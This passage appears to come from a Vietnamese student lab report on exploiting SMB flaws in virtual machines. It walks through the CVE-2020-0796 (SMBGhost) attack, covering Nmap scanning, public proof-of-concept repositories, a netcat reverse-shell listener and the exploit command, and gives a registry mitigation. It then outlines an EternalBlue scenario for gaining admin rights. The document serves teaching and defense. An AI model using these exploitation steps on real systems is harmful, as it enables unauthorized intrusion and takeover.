Bước 1 : Tiến hành rà quét
Nmap là công cụ ra quét các dịch vụ đang mở trên máy bất kì cụ thể ở máy Win dịch vụ trên port TCP/445 được quét ra.
32 | P a g e
Hình 5. 20Rà quét các dịch vụ trên các port
Bước 2:Git clone https://github.com/ButrintKomoni/cve-2020-0796 trên máy kali .
Sau khi git clone thành công sẽ thực thi các câu lệnh python3 cve-2020- 0796-scanner.py 192.168.1.117 để quét máy ảo win 10 xem có lỗ hổng CVE 2020 -0796 hay khơng .
33 | P a g e
Hình 5. 21Quét tìm lỗ hổng
Bước 3 : git clone https://github.com/ZecOps/CVE-2020-0796-RCE-POC trên máy kali để cấu hình file SMBleedingGhost.py . Sau đó thực thi lệnh nc –lvp 4444 trên máy kali để ncat sẽ hiển thị một trình bao cung cấp quyền truy cập hệ thống vào máy tính mục tiêu.
34 | P a g e
35 | P a g e
Hình 5. 23nc –lvp 4444
Bước 4 : Tải file CVE-2020-0796-RCE-POC-master.zip tại
https://github.com/ZecOps/CVE-2020-0796-RCE-POC cho máy thật win 10 Sau khi tải thành công thực thi lệnh “SMBleedingGhost.py 192.168.1.117 192.168.1.111 4444” trên cmd để exploit máy ảo win 10
36 | P a g e
Hình 5. 24Thực thi lệnh trên máy thật win 10
Kết quả đạt được : Máy ảo win 10 bị reset
Hình 5. 25Kết quả đạt được
Cách phòng chống : bằng lệnh PowerShell (run as Administrator) và không cần
khởi động lại:
37 | P a g e Set-ItemProperty -Path
"HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 –Force gpupdate /force
Hoặc có thể tắt port 445 trên máy chủ hay sử dụng firewall để chặn port này nếu không sử dụng.
4.Khai thác lỗi SMB : CVE-2017-0144 (ETERNALBLUE)
SMB: CVE-2017-0144 là là một lỗi của giao thức Server Message Block (viết tắt là SMB). Nó có tên gọi khác là ”Lỗ hổng bảo mật thực thi mã từ xa trên giao thức SMB của hệ điều hành Windows”.
SMB: CVE-2017-0144 được phát hiện lần đầu tiên vào ngày 16/03/2017 trong các máy chủ có giao thức Microsoft Server Message Block 1.0 (SMBv1). SMBv1 được đánh giá là lỗi thời, tuy nhiên vẫn tự động được mặc định kích hoạt trên nhiều máy chủ Windows, khiến đây là đích đến cho các cuộc tấn cơng an ninh mạng
Sự nguy hiểm của SMB: CVE-2017-0144:
Lỗi bảo mật SMB: CVE-2017-0144 vô cùng nguy hiểm. Khi máy tính dính phải lỗi này, hệ thống máy chủ sẽ gặp phải phần mềm độc hại ransomware, nhờ vào đây các kẻ tấn công sẽ lợi dụng để tống tiền nạn nhân.
Công cụ sử dụng Nmap
Máy tấn công Máy ảo Kali linux 64bit Đối tượng Máy ảo Win 7
Kịch bản
+Tiến hành rà quét các dịch vụ đang chạy trên máy mục tiêu bằng cơng cụ Nmap.
+Sử dụng search enternalblue để tìm kiếm modules khai thác lỗ hổng
38 | P a g e +Scan xem có lỗ hổng đó khơng
+ Tiến hành exploit lỗ hổng đó
Mục tiêu sau tấn công Thực thi tấn công, chiếm quyền admin trên máy nạn nhân